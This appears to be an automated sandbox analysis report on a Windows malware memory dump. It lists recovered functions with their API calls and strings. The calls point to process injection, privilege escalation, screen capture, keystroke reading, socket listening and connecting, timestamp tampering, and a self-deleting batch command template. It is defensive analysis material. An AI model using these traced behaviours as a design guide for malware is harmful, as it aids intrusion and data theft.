Part of subcall function 001550C0: OpenProcessToken.ADVAPI32 ref: 001550F2
Part of subcall function 001550C0: LookupPrivilegeValueW.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 00155113
Part of subcall function 001550C0: AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 00155128
Part of subcall function 001550C0: GetLastError.KERNEL32 ref: 00155132
Part of subcall function 001550C0: CloseHandle.KERNEL32(00000001), ref: 00155143

WTSGetActiveConsoleSessionId.KERNEL32 ref: 001596E8

Part of subcall function 001595BE: EqualSid.ADVAPI32(?,5B867A00), ref: 001595E1
Part of subcall function 001595BE: CloseHandle.KERNEL32(00000001), ref: 00159628

Strings

SeTcbPrivilege, xrefs: 001596DE

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00156F3F, Relevance: 14.3, APIs: 6, Strings: 1, Instructions: 88

APIs

GetFileAttributesW.KERNEL32(?), ref: 00156F50
FlushFileBuffers.KERNEL32 ref: 00157036

Part of subcall function 001644FB: FindFirstFileW.KERNEL32(?,?), ref: 0016452C
Part of subcall function 001644FB: FindNextFileW.KERNEL32(?,?), ref: 0016457E
Part of subcall function 001644FB: FindClose.KERNEL32 ref: 00164589
Part of subcall function 001644FB: SetFileAttributesW.KERNEL32(?,00000080), ref: 00164595
Part of subcall function 001644FB: RemoveDirectoryW.KERNEL32(?), ref: 0016459C

Part of subcall function 0014E826: SetFileAttributesW.KERNEL32(?,00000080), ref: 0014E82F
Part of subcall function 0014E826: DeleteFileW.KERNEL32(?), ref: 0014E836

PathRemoveFileSpecW.SHLWAPI(?), ref: 00156F85

Part of subcall function 0014E35B: GetTempPathW.KERNEL32(00000104,?), ref: 0014E376
Part of subcall function 0014E35B: PathAddBackslashW.SHLWAPI(?), ref: 0014E3A0
Part of subcall function 0014E35B: CreateDirectoryW.KERNEL32(?), ref: 0014E457
Part of subcall function 0014E35B: SetFileAttributesW.KERNEL32(?), ref: 0014E468
Part of subcall function 0014E35B: CreateFileW.KERNEL32(?,C0000000,?,00000000,00000001,?), ref: 0014E481
Part of subcall function 0014E35B: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00000001), ref: 0014E492

MoveFileExW.KERNEL32(?,?,00000001), ref: 00156FCC
CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00156FE5

Part of subcall function 0014E56C: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0014E594

Part of subcall function 0014E348: CloseHandle.KERNEL32 ref: 0014E354

Sleep.KERNEL32(00001388), ref: 00157028

Strings

.tmp, xrefs: 00156F9C

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00161051, Relevance: 14.2, APIs: 5, Strings: 2, Instructions: 47

APIs

EnterCriticalSection.KERNEL32(00183510,?,?,00000000,001611FB,?,?,?,7C809C98,00000014,00000000), ref: 00161067
LeaveCriticalSection.KERNEL32(00183510,?,?,00000000,001611FB,?,?,?,7C809C98,00000014,00000000), ref: 0016108F
GetModuleHandleW.KERNEL32(advapi32.dll), ref: 001610AB
GetProcAddress.KERNEL32 ref: 001610B2
RegDeleteKeyW.ADVAPI32(?,?), ref: 001610D4

Strings

RegDeleteKeyExW, xrefs: 001610A1
advapi32.dll, xrefs: 001610A6

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001740CB, Relevance: 14.2, APIs: 8, Instructions: 68

APIs

OpenProcess.KERNEL32(0000047A,00000000,?), ref: 001740DC

Part of subcall function 00164A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00164A89
Part of subcall function 00164A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00164AC4
Part of subcall function 00164A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00164B04
Part of subcall function 00164A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00164B27
Part of subcall function 00164A6B: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00164B77

CreateThread.KERNEL32(00000000,00000000,001740AB,?), ref: 00174132
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0017413D
CloseHandle.KERNEL32 ref: 00174144
WaitForSingleObject.KERNEL32(?,00002710), ref: 00174154
CloseHandle.KERNEL32(?), ref: 0017415B
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0017416C
CloseHandle.KERNEL32 ref: 00174173

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00171474, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 223

APIs

Part of subcall function 00172A21: getsockopt.WS2_32(?,0000FFFF,00002004,?,?), ref: 00172A47

Part of subcall function 00156B66: select.WS2_32(00000000,?,00000000,00000000), ref: 00156BC5
Part of subcall function 00156B66: recv.WS2_32(?,?,?,00000000), ref: 00156BD5

getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 0017154F
memcpy.MSVCRT ref: 00171587
FreeAddrInfoW.WS2_32(?), ref: 00171595
memset.MSVCRT ref: 001715B0

Part of subcall function 001713F4: getpeername.WS2_32(?,?,?), ref: 00171418
Part of subcall function 001713F4: getsockname.WS2_32(?,?,?), ref: 00171430
Part of subcall function 001713F4: send.WS2_32(00000000,?,00000008,00000000), ref: 00171461

Part of subcall function 00156D02: socket.WS2_32(?,00000001,00000006), ref: 00156D0E
Part of subcall function 00156D02: bind.WS2_32 ref: 00156D2B
Part of subcall function 00156D02: listen.WS2_32(?,00000001), ref: 00156D38
Part of subcall function 00156D02: WSAGetLastError.WS2_32(?,?,?,?,00000001,00000006,?,?,001715FC,?,?,?), ref: 00156D42
Part of subcall function 00156D02: closesocket.WS2_32 ref: 00156D4B
Part of subcall function 00156D02: WSASetLastError.WS2_32(?,?,?,?,?,?,00000001,00000006,?,?,001715FC,?,?,?), ref: 00156D52

Part of subcall function 00156EB5: accept.WS2_32(?,00000000,?), ref: 00156ED6

Part of subcall function 00156C17: socket.WS2_32(?,00000001,00000006), ref: 00156C23
Part of subcall function 00156C17: connect.WS2_32 ref: 00156C40
Part of subcall function 00156C17: closesocket.WS2_32 ref: 00156C4B

Part of subcall function 0017304D: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 00173061

Part of subcall function 00156D60: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00156D88
Part of subcall function 00156D60: recv.WS2_32(?,?,00000400,00000000), ref: 00156DB4
Part of subcall function 00156D60: send.WS2_32(?,?,?,00000000), ref: 00156DD6
Part of subcall function 00156D60: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00156E03

Part of subcall function 00156EE0: shutdown.WS2_32(?,00000002), ref: 00156EEB
Part of subcall function 00156EE0: closesocket.WS2_32 ref: 00156EF2

Strings

[, xrefs: 001715CD
[, xrefs: 00171609
[, xrefs: 001716E7
Z, xrefs: 00171700

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00153D4F, Relevance: 13.8, APIs: 9, Instructions: 261

APIs

GetTickCount.KERNEL32 ref: 00153D5E
EnterCriticalSection.KERNEL32 ref: 00153D73
WaitForSingleObject.KERNEL32(?,000927C0), ref: 00153DB8
GetTickCount.KERNEL32 ref: 00153DCB

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Part of subcall function 0016D95F: GetSystemTime.KERNEL32(?), ref: 0016D969

Part of subcall function 0014CEB1: WaitForSingleObject.KERNEL32(?,00000000), ref: 0014CEB9

GetTickCount.KERNEL32 ref: 00153FC5

Part of subcall function 0014F1EF: memcmp.MSVCRT ref: 0014F1FB

Part of subcall function 0014CD5A: EnterCriticalSection.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00153FA1), ref: 0014CD70
Part of subcall function 0014CD5A: memcpy.MSVCRT ref: 0014CDCD
Part of subcall function 0014CD5A: LeaveCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00153FA1,?,00000002), ref: 0014CDDD
Part of subcall function 0014CD5A: EnterCriticalSection.KERNEL32(?,?,00000000,00000000,-00001388,?,00000000,00000000), ref: 0014CE11
Part of subcall function 0014CD5A: LeaveCriticalSection.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00153FA1), ref: 0014CE9F

Part of subcall function 00153906: memset.MSVCRT ref: 001539D5
Part of subcall function 00153906: memcpy.MSVCRT ref: 00153A30
Part of subcall function 00153906: memcmp.MSVCRT ref: 00153AAB
Part of subcall function 00153906: memcpy.MSVCRT ref: 00153AFF
Part of subcall function 00153906: EnterCriticalSection.KERNEL32(?,?,00000FA0,?,-00001388,?,?,?,?,?,?,?,00000001), ref: 00153BD2
Part of subcall function 00153906: LeaveCriticalSection.KERNEL32(?,?,?,00000FA0,?,-00001388,?,?,?,?,?,?,?,00000001), ref: 00153BF0

GetTickCount.KERNEL32 ref: 00153FFE
LeaveCriticalSection.KERNEL32(?,?,00000002), ref: 00154021

Part of subcall function 0017046D: EnterCriticalSection.KERNEL32(001830F4,?,?,0014E3BD,00000000,?,?,00000001), ref: 0017047A
Part of subcall function 0017046D: LeaveCriticalSection.KERNEL32(001830F4,?,?,0014E3BD,00000000,?,?,00000001), ref: 00170488

WaitForSingleObject.KERNEL32(?,-001B7740), ref: 00154046
LeaveCriticalSection.KERNEL32 ref: 0015405C

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00153906, Relevance: 13.6, APIs: 6, Strings: 1, Instructions: 326

APIs

Part of subcall function 00165594: GetSystemTime.KERNEL32(?), ref: 001655BA
Part of subcall function 00165594: Sleep.KERNEL32(000005DC), ref: 001655D3
Part of subcall function 00165594: WaitForSingleObject.KERNEL32(?,000005DC), ref: 001655DC

Part of subcall function 0014ECBD: memcmp.MSVCRT ref: 0014ED1A
Part of subcall function 0014ECBD: memcpy.MSVCRT ref: 0014ED5A

Part of subcall function 00164BA2: memcpy.MSVCRT ref: 00164BB2

Part of subcall function 0014EE09: memset.MSVCRT ref: 0014EE1C
Part of subcall function 0014EE09: memcpy.MSVCRT ref: 0014EE37
Part of subcall function 0014EE09: memcpy.MSVCRT ref: 0014EE5F
Part of subcall function 0014EE09: memcpy.MSVCRT ref: 0014EE83

memset.MSVCRT ref: 001539D5

Part of subcall function 0014CD5A: EnterCriticalSection.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00153FA1), ref: 0014CD70
Part of subcall function 0014CD5A: memcpy.MSVCRT ref: 0014CDCD
Part of subcall function 0014CD5A: LeaveCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00153FA1,?,00000002), ref: 0014CDDD
Part of subcall function 0014CD5A: EnterCriticalSection.KERNEL32(?,?,00000000,00000000,-00001388,?,00000000,00000000), ref: 0014CE11
Part of subcall function 0014CD5A: LeaveCriticalSection.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00153FA1), ref: 0014CE9F

Part of subcall function 0014F1A8: EnterCriticalSection.KERNEL32(00183510,?,0014C78E,?,?,?,00000001,00164DE8,00000001), ref: 0014F1B8
Part of subcall function 0014F1A8: LeaveCriticalSection.KERNEL32(00183510,?,0014C78E,?,?,?,00000001,00164DE8,00000001), ref: 0014F1E2

memcpy.MSVCRT ref: 00153A30

Part of subcall function 0014CEB1: WaitForSingleObject.KERNEL32(?,00000000), ref: 0014CEB9

memcmp.MSVCRT ref: 00153AAB

Part of subcall function 00156A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,0016CB50,?,00000000,00000001,00000001,0016CB1A,?,001554E4,?,@echo off%sdel /F "%s",?,?), ref: 00156A43
Part of subcall function 00156A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0016CB50,?,00000000,00000001,00000001,0016CB1A,?,001554E4,?,@echo off%sdel /F "%s",?), ref: 00156A56

memcpy.MSVCRT ref: 00153AFF

Part of subcall function 0014F0E1: memcmp.MSVCRT ref: 0014F0FD

Part of subcall function 0014F1EF: memcmp.MSVCRT ref: 0014F1FB

Part of subcall function 0017046D: EnterCriticalSection.KERNEL32(001830F4,?,?,0014E3BD,00000000,?,?,00000001), ref: 0017047A
Part of subcall function 0017046D: LeaveCriticalSection.KERNEL32(001830F4,?,?,0014E3BD,00000000,?,?,00000001), ref: 00170488

Part of subcall function 001523F1: memcpy.MSVCRT ref: 00152409

EnterCriticalSection.KERNEL32(?,?,00000FA0,?,-00001388,?,?,?,?,?,?,?,00000001), ref: 00153BD2
LeaveCriticalSection.KERNEL32(?,?,?,00000FA0,?,-00001388,?,?,?,?,?,?,?,00000001), ref: 00153BF0

Part of subcall function 0014EEA9: memcpy.MSVCRT ref: 0014EED2

Part of subcall function 0014EDAE: memcpy.MSVCRT ref: 0014EDF9

Part of subcall function 0014F040: memcmp.MSVCRT ref: 0014F0B6

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Part of subcall function 0017E360: _errno.MSVCRT ref: 0017E37B
Part of subcall function 0017E360: _errno.MSVCRT ref: 0017E3AD

Strings

2, xrefs: 00153B51

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00155150, Relevance: 12.5, APIs: 7, Instructions: 72

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?), ref: 00155160
GetTokenInformation.ADVAPI32(00000001,00000019,00000000,00000000,?), ref: 00155179
GetLastError.KERNEL32(?,?,?,001646A1,?,001649A5,?,?,00000001), ref: 00155183

Part of subcall function 001569B0: HeapAlloc.KERNEL32(00000008,?,?,0015519B,?,?,?,?,001646A1,?,001649A5,?,?,00000001), ref: 001569C1

GetTokenInformation.ADVAPI32(00000001,00000019,?,?,?), ref: 001551AE
GetSidSubAuthorityCount.ADVAPI32(?,?,?,?,?,?,?,?,001646A1,?,001649A5,?,?,00000001), ref: 001551BA
GetSidSubAuthority.ADVAPI32(?,?,?,?,?,?,?,?,?,?,001646A1,?,001649A5,?,?,00000001), ref: 001551D1

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

CloseHandle.KERNEL32(00000001), ref: 001551FD

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00173382, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 172

APIs

Part of subcall function 00156997: HeapAlloc.KERNEL32(00000000,00000024,?,001517BF,?,00000000,00164986,?,?,00000001), ref: 001569A8

WSASetLastError.WS2_32(00000008,?,?,?,?,?,?,?,?,?,00000000,?,?,?,00000001,?), ref: 001733A6
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,?), ref: 001733F2

Part of subcall function 00172EA3: WSAGetLastError.WS2_32(?,?,?,?,?,?,0014FD6D,?,00000004,00007530,?,?,?,?), ref: 00172ED9
Part of subcall function 00172EA3: WSASetLastError.WS2_32(?), ref: 00172F21

WSAGetLastError.WS2_32(?,00000800,?,?,?,?,?,?,?,?,00000000,?,?,?,00000001,?), ref: 001734D2
shutdown.WS2_32(?,00000001), ref: 001734FD
WaitForMultipleObjects.KERNEL32(?,?,00000000,?), ref: 00173526

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

WSASetLastError.WS2_32(0000274C,?,?,?,?,?,?,?,?,00000000,?,?,?,00000001,?,00002710), ref: 0017357A

Strings

, xrefs: 001734E3

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014DFE6, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 115

APIs

EnterCriticalSection.KERNEL32 ref: 0014E010
LeaveCriticalSection.KERNEL32 ref: 0014E0C0

Part of subcall function 00154085: LoadLibraryA.KERNEL32(gdiplus.dll), ref: 00154097
Part of subcall function 00154085: GetProcAddress.KERNEL32(?,GdiplusStartup), ref: 001540AF
Part of subcall function 00154085: CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 001540EE
Part of subcall function 00154085: CreateCompatibleDC.GDI32 ref: 001540FF
Part of subcall function 00154085: LoadCursorW.USER32(00000000,00007F00), ref: 00154115
Part of subcall function 00154085: GetIconInfo.USER32(?,?), ref: 00154129
Part of subcall function 00154085: GetCursorPos.USER32(?), ref: 00154138
Part of subcall function 00154085: GetDeviceCaps.GDI32(?,00000008), ref: 0015414F
Part of subcall function 00154085: GetDeviceCaps.GDI32(?,0000000A), ref: 00154158
Part of subcall function 00154085: CreateCompatibleBitmap.GDI32(?,?), ref: 00154164
Part of subcall function 00154085: SelectObject.GDI32 ref: 00154172
Part of subcall function 00154085: BitBlt.GDI32(?,00000000,00000000,?,0000000A,?,00000000,00000000,40CC0020), ref: 00154193
Part of subcall function 00154085: DrawIcon.USER32(?,?,?,?), ref: 001541C5
Part of subcall function 00154085: SelectObject.GDI32(?,00000008), ref: 001541E1
Part of subcall function 00154085: DeleteObject.GDI32 ref: 001541E8
Part of subcall function 00154085: DeleteDC.GDI32 ref: 001541EF
Part of subcall function 00154085: DeleteDC.GDI32 ref: 001541F6
Part of subcall function 00154085: FreeLibrary.KERNEL32(?), ref: 00154206
Part of subcall function 00154085: GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 0015421C
Part of subcall function 00154085: FreeLibrary.KERNEL32(?), ref: 00154230

GetTickCount.KERNEL32 ref: 0014E06A
GetCurrentProcessId.KERNEL32 ref: 0014E071

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

GetKeyboardState.USER32(?), ref: 0014E0DC
ToUnicode.USER32(?,?,?,?,00000009,00000000), ref: 0014E0FF

Part of subcall function 0014DE64: EnterCriticalSection.KERNEL32(?,?,?,?,?,0014E138,?,?,?,?,?,00000009,00000000), ref: 0014DE7E
Part of subcall function 0014DE64: memcpy.MSVCRT ref: 0014DEEF
Part of subcall function 0014DE64: memcpy.MSVCRT ref: 0014DF13
Part of subcall function 0014DE64: memcpy.MSVCRT ref: 0014DF2A
Part of subcall function 0014DE64: memcpy.MSVCRT ref: 0014DF4A
Part of subcall function 0014DE64: LeaveCriticalSection.KERNEL32 ref: 0014DF65

Strings

, xrefs: 0014E11D

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014B28A, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94

APIs

memset.MSVCRT ref: 0014B29B
GlobalMemoryStatusEx.KERNEL32(?), ref: 0014B2B2
GetNativeSystemInfo.KERNEL32(?), ref: 0014B2E3

Part of subcall function 00160D39: RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 00160D60

GetSystemMetrics.USER32(0000004F), ref: 0014B370

Part of subcall function 00160FD5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,0016BD4B,?), ref: 00160FF2

Part of subcall function 00160D19: RegFlushKey.ADVAPI32 ref: 00160D29
Part of subcall function 00160D19: RegCloseKey.ADVAPI32 ref: 00160D31

GetSystemMetrics.USER32(00000050), ref: 0014B363
GetSystemMetrics.USER32(0000004E), ref: 0014B36A

Strings

@, xrefs: 0014B2AB

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0016B9D8, Relevance: 12.3, APIs: 5, Strings: 1, Instructions: 91

APIs

Part of subcall function 0016432D: memcpy.MSVCRT ref: 0016439E
Part of subcall function 0016432D: PathRemoveBackslashW.SHLWAPI ref: 001643A8
Part of subcall function 0016432D: memcpy.MSVCRT ref: 001643F1
Part of subcall function 0016432D: memcpy.MSVCRT ref: 0016441E
Part of subcall function 0016432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00164428

PathIsDirectoryW.SHLWAPI(?), ref: 0016BA0E
CreateFileW.KERNEL32(?,40000000,00000007,00000000,00000003,02000000,00000000), ref: 0016BA30

Part of subcall function 0016B883: memcpy.MSVCRT ref: 0016B9B6

GetFileTime.KERNEL32(?,?,00000000,00000000), ref: 0016BA76

Part of subcall function 0014E717: memcpy.MSVCRT ref: 0014E775
Part of subcall function 0014E717: memcpy.MSVCRT ref: 0014E78A
Part of subcall function 0014E717: memcpy.MSVCRT ref: 0014E79F
Part of subcall function 0014E717: memcpy.MSVCRT ref: 0014E7AE
Part of subcall function 0014E717: SetFileTime.KERNEL32(?,?,?,?), ref: 0014E813

CloseHandle.KERNEL32 ref: 0016BA95
PathRemoveFileSpecW.SHLWAPI ref: 0016BAA2

Part of subcall function 0014E348: CloseHandle.KERNEL32 ref: 0014E354

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 0016B9DE

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00164ED1, Relevance: 12.3, APIs: 4, Strings: 2, Instructions: 60

APIs

ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00164EE5
PathUnquoteSpacesW.SHLWAPI(?), ref: 00164F4A
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00164F59
LocalFree.KERNEL32(00000001), ref: 00164F6D

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s, xrefs: 00164EFC
ProfileImagePath, xrefs: 00164F26

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014AB81, Relevance: 12.1, APIs: 8, Instructions: 147

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?,00000000), ref: 0014ABB8
GetCommandLineW.KERNEL32 ref: 0014ABD9

Part of subcall function 00174333: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0017435D
Part of subcall function 00174333: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000), ref: 00174392

GetUserNameExW.SECUR32(00000002,?), ref: 0014AC11
GetProcessTimes.KERNEL32(000000FF,?,?,?,?), ref: 0014AC47
GetUserDefaultUILanguage.KERNEL32 ref: 0014ACB9
memcpy.MSVCRT ref: 0014ACED
memcpy.MSVCRT ref: 0014AD02
memcpy.MSVCRT ref: 0014AD18

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Part of subcall function 001569B0: HeapAlloc.KERNEL32(00000008,?,?,0015519B,?,?,?,?,001646A1,?,001649A5,?,?,00000001), ref: 001569C1

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014FFC2, Relevance: 12.1, APIs: 8, Instructions: 120

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,001523DE,?,?,?,00000000), ref: 0014FFCE
WaitForSingleObject.KERNEL32(?,00000000), ref: 00150009
CloseHandle.KERNEL32 ref: 0015001C

Part of subcall function 00156997: HeapAlloc.KERNEL32(00000000,00000024,?,001517BF,?,00000000,00164986,?,?,00000001), ref: 001569A8

memcpy.MSVCRT ref: 0015003F
memset.MSVCRT ref: 00150059
memcpy.MSVCRT ref: 0015009F
memset.MSVCRT ref: 001500BD

Part of subcall function 00155B40: EnterCriticalSection.KERNEL32(?,7C809F91,?,0014D091,?,?,00000000,0000EA60,00000000), ref: 00155B48
Part of subcall function 00155B40: WaitForSingleObject.KERNEL32(?,00000000), ref: 00155B6C
Part of subcall function 00155B40: CloseHandle.KERNEL32 ref: 00155B7C
Part of subcall function 00155B40: LeaveCriticalSection.KERNEL32(?,?,7C809F91,?,0014D091,?,?,00000000,0000EA60,00000000), ref: 00155BAC

Part of subcall function 00155BB5: EnterCriticalSection.KERNEL32(00C01F3C,00C01F30,?,00000001,0015E48F,00000000,0015E1B7,00000000,?,00000000,?,00000001,?,00164E98,?,00000001), ref: 00155BBE
Part of subcall function 00155BB5: CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 00155BF7
Part of subcall function 00155BB5: DuplicateHandle.KERNEL32(000000FF,?,000000FF,0015E48F,00000000,00000000,00000002), ref: 00155C16
Part of subcall function 00155BB5: GetLastError.KERNEL32(?,000000FF,0015E48F,00000000,00000000,00000002,?,00000001,0015E48F,00000000,0015E1B7,00000000,?,00000000,?,00000001), ref: 00155C20
Part of subcall function 00155BB5: TerminateThread.KERNEL32 ref: 00155C28
Part of subcall function 00155BB5: CloseHandle.KERNEL32 ref: 00155C2F
Part of subcall function 00155BB5: LeaveCriticalSection.KERNEL32(00C01F3C,?,00000001,0015E48F,00000000,0015E1B7,00000000,?,00000000,?,00000001,?,00164E98,?,00000001), ref: 00155C44
Part of subcall function 00155BB5: ResumeThread.KERNEL32 ref: 00155C5D

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,001523DE,?,?,?,00000000), ref: 00150111

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014E35B, Relevance: 11.3, APIs: 6, Instructions: 129

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 0014E376
PathAddBackslashW.SHLWAPI(?), ref: 0014E3A0

Part of subcall function 0017046D: EnterCriticalSection.KERNEL32(001830F4,?,?,0014E3BD,00000000,?,?,00000001), ref: 0017047A
Part of subcall function 0017046D: LeaveCriticalSection.KERNEL32(001830F4,?,?,0014E3BD,00000000,?,?,00000001), ref: 00170488

CreateDirectoryW.KERNEL32(?), ref: 0014E457
SetFileAttributesW.KERNEL32(?), ref: 0014E468
CreateFileW.KERNEL32(?,C0000000,?,00000000,00000001,?), ref: 0014E481
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00000001), ref: 0014E492

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00156240, Relevance: 11.0, APIs: 6, Instructions: 115

APIs

lstrlenA.KERNEL32(?,?), ref: 00156279
CreateMutexW.KERNEL32(00182974,00000001,?), ref: 001562D1
GetLastError.KERNEL32(?,?,?,?), ref: 001562E1
CloseHandle.KERNEL32 ref: 001562EF

Part of subcall function 001569B0: HeapAlloc.KERNEL32(00000008,?,?,0015519B,?,?,?,?,001646A1,?,001649A5,?,?,00000001), ref: 001569C1

memcpy.MSVCRT ref: 00156319
memcpy.MSVCRT ref: 0015632D

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Part of subcall function 00155406: CreateThread.KERNEL32(00000000,00000000,001754A0,?), ref: 00155417
Part of subcall function 00155406: CloseHandle.KERNEL32 ref: 00155422

Part of subcall function 00152FB7: ReleaseMutex.KERNEL32 ref: 00152FBB
Part of subcall function 00152FB7: CloseHandle.KERNEL32 ref: 00152FC2

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00151B16, Relevance: 10.9, APIs: 6, Instructions: 65

APIs

CreateFileW.KERNEL32(00C01EF0,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00151B2F
GetFileSizeEx.KERNEL32(?,?), ref: 00151B42
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00151B68
ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00151B80
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00151B9E
CloseHandle.KERNEL32 ref: 00151BA7

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0016BBA1, Relevance: 10.9, APIs: 6, Instructions: 57

APIs

Part of subcall function 00164214: EnterCriticalSection.KERNEL32(00183510,?,00182DB4,00000000,00000006,?,0016BBC2,00182DB4,?,?,00000000), ref: 0016422E
Part of subcall function 00164214: LeaveCriticalSection.KERNEL32(00183510,?,00182DB4,00000000,00000006,?,0016BBC2,00182DB4,?,?,00000000), ref: 00164261
Part of subcall function 00164214: CoTaskMemFree.OLE32(00000000), ref: 001642F6
Part of subcall function 00164214: PathRemoveBackslashW.SHLWAPI(?), ref: 00164303
Part of subcall function 00164214: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 0016431A

PathRemoveBackslashW.SHLWAPI ref: 0016BBCD
PathRemoveFileSpecW.SHLWAPI ref: 0016BBDA
PathAddBackslashW.SHLWAPI ref: 0016BBEB
GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,00000064), ref: 0016BBFE
CLSIDFromString.OLE32(?,00182DB4,?,?,00000064,?,?,?,?,?,00000064,?,00182DB4,?,?,00000000), ref: 0016BC1A
memset.MSVCRT ref: 0016BC2C

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00156D02, Relevance: 10.9, APIs: 6, Instructions: 39

APIs

socket.WS2_32(?,00000001,00000006), ref: 00156D0E
bind.WS2_32 ref: 00156D2B
listen.WS2_32(?,00000001), ref: 00156D38
WSAGetLastError.WS2_32(?,?,?,?,00000001,00000006,?,?,001715FC,?,?,?), ref: 00156D42
